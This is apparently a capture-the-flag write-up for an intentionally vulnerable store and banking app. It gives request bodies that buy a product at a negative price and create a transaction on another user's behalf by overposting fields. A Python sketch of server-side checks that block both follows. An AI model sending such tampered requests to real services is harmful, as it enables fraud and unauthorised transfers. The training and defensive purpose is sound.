Invalid Model

Challenge

#1: Buy product for another price

Buy a product from the store for a price other than the one that is listed.

Solution

Send a custom POST request to /api/Store/BuyProduct with the following body.

{
	"id": 1,
	"quantity": 1,
	"price": -10
}

You will find the flag in the response header.

#2: Create a transaction for another user

Create a transaction for another user.

Solution

Send a POST request to Transaction/Create with the following body. Don't forget to include the RequestVerification token and cookie in your request.

SenderId:{OtherUsername}
ReceiverId:{YourUsername}
TransactionDateTime:2020-03-25
Reason:test
Reference:test
Amount:20
__RequestVerificationToken:

You can find the flag in the response cookie.
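
Both requests above work because the server accepts fields the client should not control (price, SenderId). The following is an added sketch of the server-side checks that reject them, not code from the application; the function names, the catalogue with its price, and the session user are assumptions made for illustration.

```python
from decimal import Decimal

# Constructed sample data: the server-side catalogue is the only trusted price source.
CATALOGUE = {1: Decimal("25.00")}


class ValidationError(Exception):
    """Raised when a request carries fields or values the server must not accept."""


def buy_product_vulnerable(body: dict) -> Decimal:
    # Binds the whole request body, so the client-chosen price is what gets charged.
    return Decimal(str(body["price"])) * body["quantity"]


def buy_product_hardened(body: dict) -> Decimal:
    # Accept only id and quantity; any other field (such as "price") is rejected.
    extra = set(body) - {"id", "quantity"}
    if extra:
        raise ValidationError(f"unexpected fields: {sorted(extra)}")
    qty = body.get("quantity")
    if isinstance(qty, bool) or not isinstance(qty, int) or qty < 1:
        raise ValidationError("quantity must be a positive integer")
    if body.get("id") not in CATALOGUE:
        raise ValidationError("unknown product")
    # The price is looked up on the server, never taken from the request.
    return CATALOGUE[body["id"]] * qty


def create_transaction_hardened(session_user: str, form: dict) -> dict:
    # The sender is the authenticated user; a differing SenderId is refused.
    if form.get("SenderId", session_user) != session_user:
        raise ValidationError("SenderId does not match the logged-in user")
    amount = Decimal(str(form["Amount"]))
    if amount <= 0:
        raise ValidationError("amount must be positive")
    return {"SenderId": session_user, "ReceiverId": form["ReceiverId"],
            "Amount": amount, "Reason": form.get("Reason", ""),
            "Reference": form.get("Reference", "")}
```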
